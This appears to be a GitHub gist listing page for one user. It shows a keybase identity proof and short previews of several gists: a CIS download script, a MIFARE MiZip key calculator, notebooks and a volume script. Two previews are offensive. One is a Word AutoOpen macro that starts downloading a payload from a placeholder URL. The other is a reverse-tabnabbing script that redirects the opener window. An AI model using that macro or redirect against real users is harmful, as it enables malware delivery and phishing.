I hereby claim:
- I am y0no on github.
- I am y0no (https://keybase.io/y0no) on keybase.
- I have a public key ASDI8dOsl8SAKw5i10YPW1wfd7GwUrz38J-XtEQbgW-u0wo
To claim this, I am signing this object:
import requests | |
from pathlib import Path | |
base_url = 'https://downloads.cisecurity.org' | |
download_dir = Path.cwd() / 'CIS' | |
def download(): | |
resp = requests.get(base_url + '/technology') | |
if resp.status_code != 200: | |
return |
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/env python | |
# This script is an implementation of lua code written by Iceman: | |
# https://github.com/iceman1001/proxmark3/blob/master/client/scripts/calc_mizip.lua | |
# Thanks to him! | |
import sys | |
xortable = ( | |
('001', '09125a2589e5', 'F12C8453D821'), | |
('002', 'AB75C937922F', '73E799FE3241'), |
Hey welcome! | |
<script> | |
window.opener.location = 'https://synhack.fr'; | |
</script> |
Sub AutoOpen() | |
Auto_Open | |
End Sub | |
Sub Auto_Open() | |
payloadURL = "<Download URL>" | |
Dim req: Set req = CreateObject("Microsoft.XMLHTTP") | |
Dim payloadStream: Set payloadStream = CreateObject("Adodb.Stream") | |
req.Open "GET", payloadURL, False | |
req.Send |
{ | |
"cells": [ | |
{ | |
"cell_type": "code", | |
"execution_count": 1, | |
"metadata": { | |
"collapsed": false | |
}, | |
"outputs": [ | |
{ |
STEP="5" | |
volume() { | |
pamixer --get-volume | |
} | |
case $BLOCK_BUTTON in | |
3) pamixer --toggle-mute ;; # right click, mute/unmute | |
4) pamixer --increase ${STEP} ;; # scroll up, increase | |
5) pamixer --decrease ${STEP} ;; # scroll down, decrease |
{ | |
"metadata": { | |
"name": "", | |
"signature": "sha256:4d284779bfca916c578238b9e9740b6a57238e9d3cd47386966ec7b613577c67" | |
}, | |
"nbformat": 3, | |
"nbformat_minor": 0, | |
"worksheets": [ | |
{ | |
"cells": [ |